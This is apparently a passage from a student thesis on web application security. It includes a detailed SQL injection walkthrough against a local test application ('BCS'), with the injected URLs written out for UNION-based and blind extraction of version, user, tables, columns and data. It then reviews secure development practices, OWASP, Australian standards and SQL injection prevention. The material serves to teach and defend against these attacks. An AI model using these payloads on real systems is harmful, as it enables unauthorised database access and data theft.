Suppose we found a site which contain = sign mean it is database related website, now we
need to determine if link is vulnerable. Let's say that we have some site like this
http://localhost/bcs/admin/category_form.php?id=1
Now to test whether the link is vulnerable or not we need to add (Quote) ‘to the end of URL.
For example
http://localhost/bcs/admin/category_form.php?id=1'
29
PRT505
Thesis
If we get some error like "You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right etc..." or something similar that
means this site is vulnerable to SQL injection.
3.3.2.2 Analysing Errors
Every database has different syntax so you will receive different error message of each
database. Appendix C has included some error message of some of database
(Mirdula&Manivannan, 2013).
If you are not receiving error like above then we must have to move to next link for test the
vulnerability. So it is very time consuming process to first we have to collect each and every
link of the web application and then we must have to test each link by the payload. If you
have received penetration contract of any large web application then it may possible that it
cannot complete the process in the limit of time (Mirdula&Manivannan, 2013).
3.3.2.3 Gathering Information
Once attacker receive the information about the vulnerable web link he then start to perform
the enumeration task of various database related information. Enumeration contain various
operation such as null column analysis, database version enumeration, column enumeration
30
PRT505
Thesis
etc… in this topic we will understand that how we can enumerate database if a web
application suffer from SQLI bug(Antunes, Vieira,2009).
3.3.2.4 Enumerating column length MySQL Database
As we know that from previous practical it received the SQL injectable URL so now it is
vulnerable site, we are going one step up so we gone a enumerate a website to find number of
columns. For that we can use statement ORDER BY (tells database how to order the result).
Injected Queries in Buy Cut save Application:
http://localhost/bcs/admin/category_form.php?id=1+order+by+1--<-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+2--<-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+3--<--no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+4--<-- error ( got message like
this Unknown column '4' in 'order clause' or something like that)
All need to do is just incrementing the number until we get an error like below.
In above example it seen that received error at 4 it means that it has 3 columns, because we
got an error on 4.
After getting injection point Now we need to check for UNION function with union we can
select more data in one SQL statement(Messmer ,2008). So we can build the query as below:
31
PRT505
Thesis
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3
Above URL may be called as exploitable URL.
3.3.2.5 Null Column Analysis Manually
First of all we may add comment to behind the exploitable URL such as /* or --.
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3/*
NOTE: if /* not working or we get some error, then try -- for example
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3--
It's a comment and it's important for our query to work properly. Once we will execute above
URL in the browser after we will able to see the numeric value in the browser let say that we
have number 2 on the screen. That means number 2 is my null column for this web link. We
can exploit my sql commands through this column (Mcallister, Kirda& Kruegel, 2008).
Figure 7 Buy Cut saves Application Null Column Analysis
32
PRT505
Thesis
Above Figure 7 is the snap shot of finding the null column in the BCS web application by
performing sql injection attack.
3.3.2.6 Fetching Database Version Manually
For checking the version of the database we can simply use @@version or version () function
to get the version of the database. As we discussed previous number 2 column is null column
so, we can simply put this function instead of number two in our exploitable URL
(Shar&Tan, 2013).
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,
version(),3--
Figure 8 Buy Cut save Application Fetching Database Version
Above Figure 8 is the snap shot of experimented sql injection query and exploited the
database version in the category title colomn. It can see when we put my exploitable URL in
33
PRT505
Thesis
to this web page we can get the version of the database. Its showing in the picture 5.6.16 is
the version of the database.
If we get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then the
convert (), hex () and unhex() function can be use (Easttom,2012).
convert(@@version using latin1),3--
unhex(hex(@@version)),3--
And you will get MySQL version of the database.
3.3.2.7 Fetching Database name
To check for database name we can use the database () function for test this we need to
replace the number 2 with database() and get something like similar to below
image(Alanazi&Sarrab, 2011).
database(),3--
34
PRT505
Thesis
Figure 9 Buy Cut save Application Fetching Database Name
You can see from Figure 9 we change the database () with column number 2. And we got the
name of the database INFORMATION_SCHEMA.
3.3.2.8 Fetching User information
To check for the information about which user is using this database we will replace the
number 2 with user () and get something like bellow (Oehlert, 2005):
user(),3--
35
PRT505
Thesis
Figure 10 Buy Cut save Application Fetching User Information
We can see in Figure 10, by applying user () we got the user name root@localhost that is
using this database. This web application is running on local host server.
3.3.2.9 Database, Table, and Column Enumeration
Once the database information enumeration complete successfully now the next step is to
follow to get the list of database table and column name. In this topic it will understand that
how it can enumerate the column and table name of the database if the web application is
suffering the SQL injection vulnerability (Alanazi& Sarrab, 2011).
 Enumerating Table Name for MySQL version <5:
Now, we get the version now we will enumerate the database column name and table for
Getting table and column name well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we
must guess table and column name in most cases. Common table names are: users, admin,
and member... common column names are: username, user, user_name, password, pass,
passwd, pwd etc...
Now suppose if the SQL version 5 we get then the above method will not work but we can
use this method. For this we need database name which we already got by using database ().
We can use this information_schema database to find its table names. To get tables we use
tables_name and information_schema.column (Howard, LeBlanc&Viega, 2010).
36
PRT505
Thesis
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,t
able_name,3+from+information_schema.tables--
Here we replace the number 2 with tables_name to get the first table from
information_schema.column displayed on the bellow screen.
Figure 11 Buy Cut save Application Database, Table and Column Emuneration
You can see from Figure 11, we got the name of the first table CHARACTER_SET which is
in database Information_schema. We can add LIMIT to the end of query to list out all tables
(Ringgold& Portland, 2012).
3.3.2.10
Enumerating Column
Now, we want to get column name of particular database. We will use column_name and
information_schema.column functions to get that column name.
column_name,3+from+information_schema.columns--
37
PRT505
Thesis
Here we replace the number 2 with column_name to get the first table from
information_schema.column displayed on the bellow screen. We can add LIMIT to the end of
query to list out all columns.
Figure 12 Buy Cut save Application Enumerating Column
We can see from example which is given in Figure 12 by using that column_name function
we got the name of the column which is in information_schemadatabse.
3.3.2.11
Dumping Database
The database dumping process can start only after once we receive the information of
column. The next task of penetration tester is to enumerate the information inside the column
of the table. Database holds all the information such as password and users’ information. The
penetration tester tries to dump the database information using these techniques (Howard,
LeBlanc& Viega, 2010).
Now to check column names we can use the table name and the column name in the URL.
Once we execute the URL as below defined we will receive the information which will exist
in the defined column.
CHARACTER_SET_NAME,3+from+CHARACTER_SETS--
38
PRT505
Thesis
So, like that we can use this MySQL URL method to through the sql injection attack and as
we see in example of the web application BCS PREDICTION how we can get the all
database information by using sql injection method.
Below is the snapshot of the database which dump by using MySQL in URL method,
Figure 13 Buy Cut save Application Dumping Database
We can see in the above database in Figure 13, I found the database name, table name,
column name, and all information of the database by using MySQL URL method sql
injection technique.
3.3.3 Sql Injection InMySqlBy Blind Injection Method:
Blind injection is a little more complicated then URL injection but it can be
http://localhost/bcs/admin/category_form.php?id=1
In this time when we use above URL the page will be load normally now let’s check it’s for
vulnerable blind injection
39
PRT505
Thesis
3.3.3.1 Vulnerability Checking In Blind Sql Injection
Put 1=1 after the site. The page will be load normally because this condition will always true
 For example
http://localhost/bcs/admin/category_form.php?id=1%20AND%201=1
 Condition is true:
Figure 14 Buy Cut saves Application Blind SQL Injection Checking
The above Figure 14 explains about the blind injection vulnerability checking by passing the
values in the URL. There is not any reflection we can find in the snap shot which is given in
Figure 14 after passing the false values in the URL.
Now change 1=1 to 1=2 this is false now see what happen.
 For example
http://localhost/bcs/admin/category_form.php?id=1%20AND%201=2
So if some text, picture or some content is missing on returned page then that site is
vulnerable to blind sql injection. We can see in below snap shot when condition is false
“CATEGORY OF TYPE” became Category Title instead of “BEEF”.
40
PRT505
Thesis
Figure 15 Buy Cut save Application Blind SQL Injection Checking
Now as we can see in Figure 15, we find that the site is vulnerable of blind sql injection then
Get the MySQL version to get the version in blind attack we use sub string. We use true and
false condition with version function to check whether the version of your database is 5 or 4.
3.3.3.2 Getting Version in MySQL Database
In blind sql injection the database version get by substring function and @@version
 For example:
http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)=
5--+-%E2%80%99
This should return TRUE if the version of MySQL is 5. If the database has version 5, than
this condition will be true. So the page will load normally.
41
PRT505
Thesis
Figure 16 Buy Cut save Application Getting Version in MySQL Database
In the Figure 16, I Replaced 5 with 4, if the database has version 5 than this condition will be
false.
http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)=
4--+-%E2%80%99
As it identified in Figure 17, after passing the query, it will change some pictures or icons in
the web page. We can see from below snap shot the Category of Title is changed.
Figure 17 Buy Cut save Application Getting Version in MySQL Database
42
PRT505
Thesis
3.3.3.3 Enumerating table name from the current database:
In Blind Injection we have to guess tables name with the condition. If the condition is true
than page will load normally.
We will try with different table names as it’s given below in Figure 18, 19 and 20:
 (1) Passwords
http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201
%20from%20passwords%20limit%200,1)=1--+(We got an Error)
Figure 18 Buy Cut save Application Enumerating Name from Database
 (2) Users
%20from%20users%20limit%200,1)=1--+(We got an Error)
43
PRT505
Thesis
 (3) Admin
%20from%20admin%20limit%200,1)=1--+(Page will load normally, that means condition is true. Database has one table which
name is “admin”.
3.3.3.4 Enumerating Column Name:
Now what we the same as table name, we start guessing. Like I said before try the common
names for columns.
44
PRT505
Thesis
 (1) User id
 http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substri
ng(concat(1,userid),1,1)%20from%20admin%20limit%200,1)=1--+If the page loads normally we know that column name is User id in Admin table (if
we get false then try other common names or just guess). In below Figure 21, we can see we
got an error that means there is no user id column in Admin table.
Figure 21 Buy Cut save Application Enumerating Column Name
 (2) Admin_id
 http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substri
ng(concat(1,admin_id),1,1)%20from%20admin%20limit%200,1)=1--+-
45
PRT505
Thesis
Figure 22 Buy Cut save Application Enumerating Column Name
As we can find in Figure 22, the page will load normally that means there is a column which
name is admin_id in admin table.Like this with the using of Blind SQl injection techniques
we dump the database.
46
PRT505
Thesis
V. Literature review on web security practices
5.1 History of web application security fields and practice
Web Application introduced in 1990, the web was a general, delivery mechanism. It is
transform from a for static hypertext documents to a complete dynamic run-time environment
for multi-party and distributed applications. The web technologies have progressively
transformed from a centralised server technology to an interaction models and dynamic client
model. The emerging trend was popular in peer-to-peer web applications and multiple
applications. But the transformation of the web application from the server-centric model
creates a significant and numerous challenges in web applications security (Alanazi & Sarrab
2011). In the past decade it was not possible to make web application client centric. Thus it is
work as motivation in the need for compact security of web application.
Dev
elo
pm
ent
W3C
Php 1.0
Issu
& Apache
e
Released,
IIS
First Web
Server
And
Browser
Intoduced
1.0 Releaed
On Windows
NT, Live
(Java) Script,
Mysql And
IE1 Released
OWASP
Started,
ASP.Net 1.0
Released, SQL
Slammer Worm
Started, Works
Started On
Html5
Infi
nite
Cod
ing
Err
Samy Worm
Released,
ors
AJAX Term
Web
Application
Hacking
Arrives
Proposes, Web
Vulnerability
Scanner
Introduced
Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au,
2015)
As above Figure 23 explain about the development if the web server and the languages which
took web applications in the world market. After the introduction of web server and browser,
the continuous development is started. Hence it is a service of transformation, it security
concerns starts with its progress. The year 1995, is the year of new achievements in the area
of web development, lots of new things are discovered. In late, 1994 W3C introduced. PHP
47
PRT505
Thesis
1.0 and Apache server was introduced in 1995 (Alanazi & Sarrab 2011). Microsoft releases
their software for web development named IIS and also internet exploer 1 is introduced.
There are some methodologies which are worked for the security of web application at initial
level of the development.
Fine-grained access control: These are the policies which define how the application
authentication process goes and application authorizes end users. In the beginning of web
application, security is simple from which web application frameworks checked, and the
simple sequences maintain the application’s integrity. There was a series of questions from
foundation for authentication process and protocols limits to the feasibilities of authentication
such as secure session management (Alanazi & Sarrab 2011).
Information-flow control: It specifies the security of sensitive data, trust domains, data
integration, and client-side and server-side information processing. Initially in web
development, organisation’s policies are the base for the security policy of a web application.
Information-flow policies involved individuals with possibly certain goals. That time tracking
end-to-end information and its flow in web applications could not be find out and is follow by
end user review. Information-flow control policies are set of mechanisms practically
implemented in a web setting.
Secure composition: In the starting, securities are applying in the code of web applications. In
short, coding part solely responsible for the security of a web application. Traditional HTML
fails to deliver both the interaction and security needs. Security is composition of interaction
and separation.
Cross-domain interaction: The original and unresolved problems of the last decade in web
development, is the inherent incompatibility. That is lies in cross-domain nature of the
hyperlink. In the past, situation was even more complex. Now days, java script plays an
important in securing the web application from its birth in web application development. This
scripting language is formalizing its semantics. Now the HTML5 also come with lots of
security features for various threats regarding to web application. (Desme and Johns, n.d.)
5.2 Web security design with software engineering
Most of the applications developed with the software engineering models that help in
management of resources. Organisations are not fully aware about the fact of security issues
which were not considered as a serious element in development life cycle.
48
PRT505
Thesis
The organisations manage security of application by separate processes to meet requirements.
Meanwhile SDLC provides options for security of an application. The security service can be
implementing with the phase of the development life cycle (Meier, 2006).
Figure 24 Security in SDLC Process (SANS Institute, 2007)
The given Figure 24 explains about the security in SDLC, which define the techniques to
represent the secure software development process.
5.2.1 Security Requirements
To find out the requirements, first step is to classify the Application. At the application
development beginning, the level of expected security for the software will be found out.
Application is categorized on the basis of the application usage, sensitivity of data, and
technology to be use and also application type i.e. web based or non-web based application.
This will helps in set the level to be required for the application that is low, medium or high.
(SANS Institute, 2007)
49
PRT505
Thesis
5.2.2 Secure Application Design and threat modelling
It is need to concern about web application security and the potential vulnerabilities which
may mitigates the application if it is not designed in security measures. In an architectural
level of web application, surface area of attacks must be measured. The design must be based
on the assumptions and researched potential threats (Nahari, Krutz, & Books24x7, 2011). In
the formal application security requirements and specification are combined. This activity of
phase is called threat modelling. It helps in understanding of possible threats for the
application. The threat modelling includes the application components definitions,
segmentations of applications, and finds dependencies (internal and external). It is necessary
to resolve the possible issues. At last of the phase, the finalise design is reviewed from
security point of view. There are also some vulnerability techniques and modelling tools are
used for threat analysis. Some of the common threats include loss of sensitive data, denial of
the service, unauthorized access etc.
The common threats can be loss of confidential data, unauthorized access, denial of service
attacks, etc. By identify all illegal actions that could be engaged to application, it is necessary
to attack actions. This would help in diminishing the risks associated with the malicious
system use. The reaction of risk activity can be eliminate the risk or reduces the risk and also
receive the risk.
5.2.3 Develop with Secure CodingIt is known thing that the probable security bugs lift in the application, mainly during
development phase. During development phase, the security issues occurrence depends on
the coding conventions, coding standard, choice of language, development environment,
baselines for security, data handling methods, integration with external applications and
implementation of security features. Coding standard needs to establish for your securing
applications. There are many ways and techniques available for different technologies to
write code with secure approach. These techniques required to be utilize to maintain security
issues and coding errors.
Hence, the vital thing is that these practices are approached in the code for all the modules of
applications thus bugs can be found in the early phase of development rather than the code set
for distribution.
5.2.4 Application Security TestingThe importance and cost has increased with completion of each phase of development life
cycle model. Thus it is need to be making test strategy for every phase. Testing of each phase
50
PRT505
Thesis
helps in prevention of error or defect present in the application. Generally testing implies in
last phase after deployment of all code, by black box testing to find potential risks. Black box
testing is most common and reliable approach implies for the testing. But the risks and bugs
are increasing exponentially, in similar way testing application are also developed for that
reasons. The automation testing is growing fundamental to test applications.
(Mehta, n.d.)
5.3 Standards of the Australian web security
There are some norms which are described by defence department of Australian government
for the web security. The web application security services can be implemented on the serverside. Security activities include input validation, java script enabling or disabling on client
side, HTTP compatibility of header etc. we will discuss on the following three policies and
standard (dpc.sa.gov.au, 2015).

Content Security Policy

HTTP Strict Transport Security

Cookie Security Enhancement.
5.3.1 Content Security Policy
A content security policy helps in diminishing attacks like XSS (cross side scripting);
malicious content etc. to imply this standard on a web application, developers has to
impose whitelist content sources. This security standard manages scripts, audio, video and
images. This standard also helps in executing of inline java script and strings were not
created (dpc.sa.gov.au, 2015).
Content security policy helps developers in reduce concerns over the compromises of the
web application. It is effective way to imply basic standard for an application. This policy
give motive to web browser for reporting any breaches present in the website.
5.3.2 HTTP Strict Transport Security
HTTP Strict Transport Security (HSTS) alleviates the risk of information leaking and
eavesdropping. HSTS guides browsers to use only secure connections when communicates
with the web application. Secure connections required for a website when a web application
deals with the personal data or say sensitive information. It is challenging task when site is
complex (dpc.sa.gov.au, 2015). HTTPS reserves the session id in mean while communication
of sensitive information transfers. HTTPS not allows the connection to the unsecure content.
51
PRT505
Thesis
HSTS can help solve without requiring large changes to the web application. Consider this
example it shows a transaction sequence for entering in the website i.e. sign in process by
providing personal information. The Txn site has been developed in poor way and permits
sensitive information to pass over unencrypted HTTP requests.
Figure 25 HTTP Strict Transport Security
The given Figure 25 explains about the data which flows with the web security between
browser and the web application. It explains in details below:
5.3.3 Cookie Security Enhancements
Websites uses cookies to store session IDs used for authentication of a user. It is important
thing that these cookies are secured and avoids the discovery of this session ID that can be
lead to illegal access to website. The cookie security can be enhanced by implement of
content secure policy and HSTP (Asd.gov.au, 2015).
52
PRT505
Thesis
5.3.4 Input validation requirements standers
I used below Australian standard with input validation requirements to check whether BCS
web application match that standard or not. As we tested BCS web application with SQLI
attacks and we hacked the whole database of the web application. Now as we go through the
whole attack techniques we passed injectable script or queries to hack that database and web
application allow that queries or script on the URL (dpc.sa.gov.au, 2015). Basically web
application is accepting every user input that is the main reason why BCS application hacked
through the SQL Injection. So, we used this standards for checking wether BCS is filtering
the user input or not and it is sanitising the user input or not we followed the below user input
requirements standers for our web application security for securing BCS web application
from SQL Injection.
Figure 26 Australian Standard Input Validation Requirements
53
PRT505
Thesis
Every country have their own standards for web security, in Figure 26 I have mentioned the
Australian standards for input validation requirements which I used to secure BCS web
application from SQL injection attack.
5.4 Current situation for security testing of web application
With the continuous dynamically growth in web development and the integrated applications,
security testing methodology also requires to appropriate advancement to provide security for
Web applications. In the current time the security testing is done with many technologies and
methodologies. Methodologies are applied with the same concept but individuals own frame
of mind. There are some terminologies needs to be clear about testing and used in web
application security testing.

Vulnerability- It occurs in the layered architecture of a web application. It is issues
regarding the weak scripts or scripts with a bug.

URL manipulation- The web application transfers information between the server and
the client in the URL. Sometimes a changing the URL led to unpremeditated
responses by the server.

SQL injection- It is process of helping information from server by inserting similar
SQL statements from the server

XSS (Cross Site Scripting) - When a user introduces client-side script in the web
application’s user interface and by this insertion, that is visible to other users, it is
called XSS.

Spoofing- It is refers to create replica of web pages of a web application and website’s
services like emails.
Security testing is in primary stage because security testing is delivering the required results.
In simple means, the potential threats can be finding and resolve out by the current
techniques. The following figure is show the processes applied in the security testing.
54
PRT505
Thesis
Figure 27 Steps for Security Testing
The above Figure explains about the step of security testing. In the last few years, the
fear of hacking is increased because some of vulnerabilities found in SSL. That
vulnerability is found after the 2 years if its implement in all over world. The
vulnerability named as ‘Heartbleed’ as it is found in the concept of heartbeat of the
secure socket layer. This vulnerability raises the efforts and requirements of security
testing. This adds the security in testing infrastructure of a web application which has
purpose to discover the vulnerability and safe data from unauthorized access. There
are many approaches for security testing. Generally testing activity is performed at the
last stage of SDLC. During testing three things never been modified which are as
following:

Server or application configuration

Services running on the server

End user data hosted by the web application
55
PRT505
Thesis
Figure 28 Top 10 Reported Vulnerabilities in Web Application
The above Figure 28 shows the websites which have been found with the number of
vulnerabilities. These are the leading websites of IT companies in the world. It shows data
when Heartbleed vulnerability occurs. After this severe issue, in the website security, the
security testing becomes a rage because everyone wants to save their sensitive information
from hackers (Erdogan, 2009).
5.4.1 Google introduced two layer authentications:
Google steps up security of web applications
"This makes it much more likely that you're the only one accessing your data. Even if
someone has stolen your password, they'll need more than that to access your account,"
EranFeigenbaum, director of security for Google Apps, said in a blog post.
SAN FRANCISCO, Sept. 20 (Xinhua) -- Google on Monday introduced a two-step
verification process to boost the security of Google Apps, its web-based suite of email,
messaging and collaboration applications.
The two-layer authentication requires Google Apps users to sign in to their account with the
combination of a password and a verification code sent to their mobile phone.
The company believed that the new measure will give users stronger protection to help fend
off risks like phishing scams and password reuse.
"This makes it much more likely that you're the only one accessing your data. Even if
someone has stolen your password, they'll need more than that to access your account,"
EranFeigenbaum, director of security for Google Apps, said in a blog post.
56
PRT505
Thesis
The enhanced protection is now available to businesses, government and education
institutions that have subscribed to Google Apps.
"In the coming months, we'll also be offering this same security to our hundreds of millions
of individual Google users," Feigenbaum said.
The bad guys have the luxury of picking their shots. They may attack a system whenever they
want to, or not (Ryan, 2012).
5.4.2 Introduce SSL (Secure socket layer):
Use of an SSL signed certificate helps prevent the following attacks:
• Network sniffing. Without SSL, your data is sent across the network using an unencrypted
channel. This means that anyone along the path can potentially sniff the traffic off the wire in
clear text.
• Web site spoofing. Without a valid SSL site certificate, it is more difficult for attackers to
attempt to use phishing sites that mimic the legitimate site. The use of SSL does help mitigate
these two issues, but it has one glaring weakness. The use of SSL does absolutely nothing to
prevent a malicious user from directly attacking the web application itself. As a matter of
fact, many attackers prefer to target SSL-enabled web applications because using this
encrypted channel may hide their activities from other network-monitoring devices (Ryan,
2012).
VI. Methodologies for securing web applications
There are many methodologies for securing web applications. Amongst them here we discuss
three of them with working methodology:
1. Agile Security testing
2. Penetration testing
3. OWASP frameworks
6.1 Agile security testing
The idea of agile security testing is adapting with the same thinking that drives agile software
engineering method in which traditional practice are applying to justifying security risks in
Software. Basically, it is an iterative process to deliver the best solution in application
security (Bavani, 2012). It translates the security objectives and requirements into test
security with automatic test cases. It also endorses the idea of starting security test cases
before the system fully develops.
57
PRT505
Thesis
The Agile Security Testing methodology as it’s mentioned in Figure 29 has following three
main steps (Ghani, Azham & Jeong, 2014):
1. Modelling of security requirements
2 Employing a highly testable architecture.
3. automated security tests.
The modelling of security requirements is implemented by generating abuser stories, in
simple words misuse cases. In this methodology, a user must be recognized and authenticated
with a genuine combination of username and password to get privilege access in the Web
application. The encrypted communication always required between a client and the Web
application. Web application’s network traffic shall be observed for possible denial of service
(DoS) attacks.
Presently, Web applications built with three layered architecture. First is a presentation layer,
second is business service layer and third is data service layer. The business service layer is
can be divided in two layers first a process layer and second is business entity layer. A highly
testable architecture is getting by inserting a test layer on top of each layer. The resultant
structural design is suitable for agile development methodologies because of multiple test
layers. It also helps in security testing because the architecture allows doing many security
testing techniques within the any test layers. In general, in this architecture, testing can be
done in three main levels with different testing strategies. Firstly, by producing simulated
objects, it is easy to execute a single test layer. Then, by targeting an upper layer and the
depending latter layer of that, now an integration test can be executed after that, by having
security requirements as reference points, it is potential need to verify or falsify a required
security property of the system. In order to get completely benefits from Agile Security
Testing, it is necessary that security tests must be automated as much as possible. It is third
step of agile methodology.
58
PRT505
Thesis
Figure 29 Agile Software Testing Process
6.2 Penetration testing
Generally it is the most applied security testing methodology which is given in Figure 30,
but it can be exploited security testing methodology (Antunes & Vieira, 2014). To prevent the
misuse of penetration testing, Thompson proposes a structured penetration testing
methodology. This methodology is stricter than Agile Security Testing. Preferably, it is
applicable for Web application development projects and consists of the following five main
steps (Antunes & Vieira, 2014):
1. Create a threat model
2. Build a test plan
3. Execute test cases
4. Create the problem report
5. Execute a post-mortem evaluation

The first step in this penetration testing methodology is to create a threat model for
detailed and written description of the risks that can looms

The application. It has the utmost importance to moderate. Threat modelling is quite
similar to the misuse case approach. In short means thinking like a hacker when
constructing the model. The key thing in threat modelling is the facility to get an
impression of the various vulnerabilities that have to be present in order to realize a
given threat. For a Web application that allows users to manage their bank account
online. A threat modelling process helps security testers to break an utilizable threat
goal into testable sub goals that they can assess more simply.
59
PRT505

Thesis
The second step is to build a test plan. It is a road map for test plan. It is made to get a
high-level overview of the security test cases. It gives an overview of how investigative
testing that is simultaneously provide learning, test design, and test execution, and to get a
synopsis of which components will be tested. The test plan addresses the following key
points.
1) Logistics: The security testing project is needed to be schedule and resources both human
and machine also must be addressed.
2) Deliverables and timeline: To support the development it is necessary to integrate the
results with the project timeline. A proper timetable of activities and a list of deliverables
along with their description must be addressed.
3) Test cases and tools: An overview of the security test cases that will be design and
executed, the tools that are needed to conduct the tests, and the opportunities for
automated testing along with their tools must be addressed.

The third step is to execute the developed test cases. Security issues and insecure
behaviour of software is hard to understand. Thus it is challenging to make good
security test cases. Fortunately, there are much extensive vulnerability that affects
most databases and mailing lists of public.

The fourth step is to make a report on the things on outcome from the security testing
process. This is precarious for proofing that a given vulnerability is exists in the web
application (Owasp.org.au, 2015).

The fifth step is to execute a post mortem assessment. Post-investigation is evaluation
that is getting by a meeting session of the security test team. They analysis the
security bugs/flaws that were detected during the testing process.
The main focus in this evaluation is that why these vulnerabilities were not found
during development process and give solutions to improve the process to prevent such
vulnerabilities and other security issues. Post-mortem evaluations also help a security
testing team in provide a way in the testing process, and also give idea more perfect
techniques to find security vulnerabilities.
60
PRT505
Thesis
Figure 30 Penetration Testing
6.3 Open Web Application Security Project (OWASP)
The Open Web Application Security Project (OWASP) is an open, non-profit, community
especially dedicated to support organizations to develop, buy, and maintain applications
that will trusted from the case of security issues which is mentioned in Figure 31
(Owasp.org.au, 2015). All of the OWASP
Tools are free and available for anyone interested in help to improve applications
security.
61
PRT505
Thesis
The OWASP Testing Framework consists of five main phases (Owasp.org.au, 2015):
Figure 31 OWASP Testing Work Flow (Owasp.org.au, 2015)
 Before development begins
(a) Review policies and standards: policies need to be reviewed to ensure that appropriate
standards and documentation are available and ready to use for the development teams. It
62
PRT505
Thesis
also gives development teams guidelines and detailed idea that they can follow (Owasp.or.au,
2015).
(b)Develop measurement and metrics criteria: measurement and metrics criteria, required to
be defined. They can be use through-out the project. It also gives the way of light to look out
defects in both the process and the product development. It also ensures the traceability of
applications (Owasp.org.au, 2015).
 During definition and design
(a) Review security requirements: It is important to have definite and decided requirements.
This activity is need to perform reviewing, testing and to make assumptions on the basis of
requirements. In other words Security requirements, are reviewing to look if there is missing
out some terms in the security requirements and definitions. To look out these terms, the
following properties for security should be considered (Owasp.org.au, 2015):
I.
II.
User profile Management
Authentication process
III.
Authorization
IV.
Data Confidentiality
V.
Session Management
VI.
VII.
VIII.
IX.
X.
Transport layer Security
Integrity
Accountability
Privacy
Tiered System Segregation
(b)Review design and architecture: The Design documents that are models describing the
application architecture, and their equivalent documented descriptions require reviewing. It
will ensure that the architecture apply the appropriate level of security as defined in the
requirements. Security flaws are Identify in the design phase. Design phase are most effective
places to do changes (Owasp.org.au, 2015).
(c)Create and review UML models: Unified Modelling Language (UML) models used to
describe how the application works. They must be reviewed in order to discover security
weaknesses. It helps in an understanding of the working application (Owasp.org.au, 2015).
(d) Create and review threat models: After the design and architecture review of application,
along with the UML models gives explanation exactly, how the system will work. A security
model must perform to analyse realistic threat scenarios. It makes possible to ensure that the
63
PRT505
Thesis
threats have been moderated. This analysis also discovers potential threats for which any
mitigation strategies are not defined. Such findings can use for reference points to adjust the
design for potential threat (Owasp.org.au, 2015).
 During development
(a)Code walkthroughs: In this step security team should accomplish a code walk-through
with the system architects and developers to understand the flow, the layout, and the structure
of the code that builds the application. The developers can explain the logic and flow of the
applied code. It also helps the code review team to get about the code, and by this developers
can explain about things the way, they were developed (Owasp.org.au, 2015).
(b) Code reviews: Code walkthrough give better understanding to the security team about the
code structure. It will be a good initial step of reviewing the code for possible security
defects.
 During deployment
(a) Application penetration testing: in this step Reviews are carried out for the security
requirements. It includes the analysis of the design and architecture for security flaws. It also
executes security code reviews. A penetration testing carried out to ensure that anything has
not been missed (Owasp.org.au, 2015).
(b)Configuration management testing: The application penetration testing process includes
the scrutiny of how the infrastructure was managed and secured. A configuration may include
a default install stage and found vulnerable issues to exploitation.
 Maintenance and operations
(a)Conduct operational reviews: A process needs to describe for the operational side of both
the application and structure.
(b) Conduct periodic checks: This step ensures about the security risks. It found the level of
security if it is still sound then health checks of the application
(c) Ensure change verification: It is vital to check that the new develop application hasn’t
affected the security negatively. This step verifies the change. (Erdogan, 2009).
64
PRT505
VII.
Thesis
Approach for preventing SQL injection attack
SQL injection is a vulnerability of web application security. In this vulnerability attacker or
hacker is able to insert a SQL query in the database which will be executed by a web
application. It results the exposure of the back-end database of the website. A hacker attack
website by SQL injection occurs when a web application develops user credentials data
without proper validation and encoding within a command or query. SQL injection permits a
hacker to insert, read, alter delete or update data saves in database. It is one of the most
dominant web application security vulnerability.
Key Concepts of a SQL Injection Attack:

When user credentials redirected to the SQL interpreter with a query, there is
possibility of happening SQL injection vulnerability or data theft.

Hackers use a specific data to the SQL interpreter as input and confuse the interpreter
to execute involuntary commands.

In this vulnerability, SQL interpreter twirls by the hacker fake replica query that the
SQL interpreter cannot distinguish between the original commands and fake data
replica.

A SQL injection affects the database layer of web application.
7.1 Preventing SQL Injection:

A proper input validation technique will prevent SQL injection. In this, authentication
is performed by setting protocols for users to create their credentials strong.

There should be least permissions for users to access database. The stored procedures
need to be deleted which are not in use. As a website administrator, a person needs to
create their credentials which are not easy to guess i.e. the personal details.

Stored procedure required to show and utilize more because they are safe from SQL
injection. The concatenating arguments of stored procedure can be injectable, so need
to aware of it.

A parameterized query API insertion and use also helps in it. It will be used with
substitution markers. (DuPaul, 2015)
SQL injection can be one among the most hard attacks to thwart and powerful to exploit.
However defences are available to make them less damaging or less likely to occur. At first
the most powerful defence mechanism is a proper use of validation. For instance if the webapplication expects an e-mail address then the application should validate and filter the input
65
PRT505
Thesis
based on the email address format. Validation can be performed either by implementing
whitelisting or black listing mechanisms. This means what can be accepted and what should
be dropped.
Validation of information can be implemented either on client side or the server side. But to
be fair enough it is preferable to be used in both environments, because client side it’s quite
easy for an attacker to by-pass the security measure. It seems to be like if the validation
mechanism is implemented on the server side, we can reduce the risk to the maximum level.
It will not complete as client side also required this mechanism to be incorporated because
client environment is also valuable as it not only offloads some processing but can also
prevent malicious results getting from the server.
Figure 32 Prevention for SQL Injection (Dupaul, 2015)
Above Figure 32 explain about the how we can protect the web application from sql injection
attack.
Some common defences are as follows:
 Make no assumptions about the size, type, or content of the data that is received by
the application.
 Test the size and data type of the input and enforce appropriate limits to prevent
buffer overruns
 Test the contents of string variables and accept only expected values
 Reject entries that contain binary data, escape sequences and comment characters
 Never build transact-SQL-statements directly from then end-user input and use stored
procedures to validate user input
66
PRT505
Thesis
 Implement multiple layers of validation and never concatenate the user input that I not
validated
7.2 Prevention of SQL injection attacks by using Filters and techniques
There are many techniques which are helpful in SQL injection prevention. The following
techniques which has mentioned in Figure 33 are used for inhibition SQL injection attacks.
Defensive coding: There are many approaches in coding that can be used to counter SQL
injection such as input filtering, type checking of input. Implement of parameterize query
